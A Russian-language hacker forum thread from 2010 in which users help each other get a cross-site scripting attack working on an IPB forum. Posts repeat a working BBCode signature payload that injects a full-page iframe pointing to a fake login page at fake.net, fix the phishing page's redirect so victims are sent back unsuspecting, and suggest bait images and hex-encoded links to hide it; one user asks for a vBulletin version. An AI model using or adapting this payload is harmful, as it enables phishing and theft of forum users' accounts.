Здравствуйте.
Решил попробовать сделать XSS
Фейк сделал и залил чтоб работал без проблем, а влт сжедать чтоб выскакивали на форуме не могу.
Подскажите пожалуйста что я неправильно делаю, вот код:
x3Cifr*ame естественно без *
Неработает никак, часа 4 промучился на форуме [Ссылки могут видеть только зарегистрированные пользователи. ]
то что это для ipb а не для булки вот че ты неправильно делаеш
А если в подписи остается код, значит не работает? Ибо акроним там разрешен это знаю.
оО ну не знаю тут и с видимым кодом переадресует [Ссылки могут видеть только зарегистрированные пользователи. ] (переадресовывало и до того как я добавил еще два варианта кода ниже)
Последний раз редактировалось ATJIaHTuK; 10.07.2010 в 09:55.
А если в подписи остается код, значит не работает? Ибо акроним там разрешен это знаю.
оО ну не знаю тут и с видимым кодом переадресует [Ссылки могут видеть только зарегистрированные пользователи. ] (переадресовывало и до того как я добавил еще два варианта кода ниже)
Да, если в подписи ты видиш свой код, значит там точно не получиться....
Сказано ведь, забудь, там работать не будет просто, только палишся...
Последний раз редактировалось ATJIaHTuK; 10.07.2010 в 09:56.
[acronym=test1[acronym=test2 onmouseover=document.write("\x3C******\x20src=http://fake.net/2/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E");document.close(); ]_]Мышку не наводить, выбьет с форума))[/acronym]_[/acronym]
Все норм, переходит на фейк, ввожу валидный акк и пишет что акк не правильный, мол попробуйте еще раз. Чего не хватает? Ибо я думаю он должен логиниться и переходить на их форум.
Возможно когда ты просматиривал сообщение в форуме когда тя перебрасывало ты был незалогинен на форуме.
Фишка работает когда ты залогинен на форуме и просматриваеш сообщение под своим профилем и тя перебросило на фейк. Тогда ты водиш пароль и логин и тя снова бросает на форум где ты уже до того залогинен.
Думаю проблема в этом.
[acronym=test1[acronym=test2 onmouseover=document.write("\x3C******\x20src=http://fake.net/2/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E");document.close(); ]_]Мышку не наводить, выбьет с форума))[/acronym]_[/acronym]
Все норм, переходит на фейк, ввожу валидный акк и пишет что акк не правильный, мол попробуйте еще раз. Чего не хватает? Ибо я думаю он должен логиниться и переходить на их форум.
Ты в скрипте посмотри куда стоит редирект.
Если так:
[Ссылки могут видеть только зарегистрированные пользователи. ]
То поправь на
[Ссылки могут видеть только зарегистрированные пользователи. ]
И все должно получиться.
Возможно когда ты просматиривал сообщение в форуме когда тя перебрасывало ты был незалогинен на форуме.
Фишка работает когда ты залогинен на форуме и просматриваеш сообщение под своим профилем и тя перебросило на фейк. Тогда ты водиш пароль и логин и тя снова бросает на форум где ты уже до того залогинен.
Думаю проблема в этом.
Был залогинен.
Цитата:
Сообщение от F4ll3nL0rD
Ты в скрипте посмотри куда стоит редирект.
Если так:
[Ссылки могут видеть только зарегистрированные пользователи. ]
То поправь на
[Ссылки могут видеть только зарегистрированные пользователи. ]
И все должно получиться.
Точно))
Последний раз редактировалось wagan; 10.07.2010 в 19:03.
Причина: Добавлено сообщение
Firefox 4.01 и 3.6 то-же что и с оперой, если кто сталкивался, обьясните что не так
Добавлено через 7 часов 4 минуты
сорри, не посмотрел первое сообщение до конца, заменил звёздочки-пашет, автору плюс огромный, если кто сможет подкинуть код для булки(vbulletin) буду оч благодарен.
Хочу добавить, что лучше всего вместо текста ставить картинку вроде [img*]http://img143.imageshack.us/img143/3750/dig.gif[/img*] (без звёздочек)
После лучше шифрануть ссылки в 16-тиричный вид можно в вебе на ха.кер.орг а можно самому [Ссылки могут видеть только зарегистрированные пользователи. ] тут есть исходник html для такого энкодера
Последний раз редактировалось Libert; 12.07.2010 в 20:52.
Причина: Добавлено сообщение